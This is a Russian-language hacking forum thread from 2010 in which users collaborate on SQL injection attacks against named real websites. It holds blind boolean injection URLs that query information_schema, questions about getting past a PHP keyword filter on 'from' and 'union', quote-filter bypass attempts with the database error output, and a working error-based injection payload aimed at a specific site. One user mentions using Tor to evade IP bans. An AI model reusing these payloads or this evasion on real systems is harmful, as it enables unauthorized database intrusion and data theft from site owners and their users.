10.03.2010, 04:06
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
http://www.gtbit.org/news/viewitem.php?id=37
ещё в чём фишка:
если так
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+table_name+from+information_schema.tables),1,1))=53
то страница Not Acceptable
а если
Код:
http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+123+from+123),1,1))=53
то Internal Server Error
Довольно странно, получается что запрос выполняется
Последний раз редактировалось Seravin; 10.03.2010 в 04:19..
|
|
|
10.03.2010, 04:31
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
оно там еще по ip банит, сцуко
|
|
|
|
10.03.2010, 04:37
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода
PHP код:
$id=$_GET['id'];
$id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi
if (strstr('from',$id)>0) showerror;
как такое обойти? |
|
|
|
10.03.2010, 09:44
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Seravin
есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода
PHP код:
$id=$_GET['id'];
$id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi
if (strstr('from',$id)>0) showerror;
как такое обойти? PHP  ))
id=123456768+union+select+1+--+
12345678 больше нуля, и проходит дальше, PHP сравнивает только первое вхождение.
|
|
|
|
10.03.2010, 12:02
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Ctacok
PHP ))
id=123456768+union+select+1+--+
12345678 больше нуля, и проходит дальше, PHP сравнивает только первое вхождение. Что-то ты какую-то хрень непонятную написал)
У меня ищет вхождения подстроки 'from' и 'union', проичём тут 12345678?
|
|
|
|
10.03.2010, 12:43
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Seravin
Что-то ты какую-то хрень непонятную написал)
У меня ищет вхождения подстроки 'from' и 'union', проичём тут 12345678?
Не о том подумал =\
Я думал про фильтрацию числе.
Ну если на union, можно как слепую.
|
|
|
|
10.03.2010, 12:49
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Сообщение от Ctacok
Не о том подумал =\
Я думал про фильтрацию числе.
Ну если на union, можно как слепую.
ну это понятно, но тут второй косяк: фильтрация на from ещё...
|
|
|
|
10.03.2010, 08:09
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
карочи я вообще задолбался раскрутит эту скул:
http://www.bourdela.tv/index.php?topic=2'
никак не могу обходит фильтр кавычки, всё перепробовал
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?topic=2'' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
может кто посоветует обход |
|
|
|
10.03.2010, 16:29
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от YuNi|[c
карочи я вообще задолбался раскрутит эту скул:
никак не могу обходит фильтр кавычки, всё перепробовал
может кто посоветует обход
http://www.bourdela.tv/index.php?topic=2')and(1=1)--+
тоже одинаковый результат
|
|
|
|
10.03.2010, 17:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
YuNi|[c,
http://www.bourdela.tv/?'or(select+count(*)from(information_schema.column s)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/7,1)*'
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
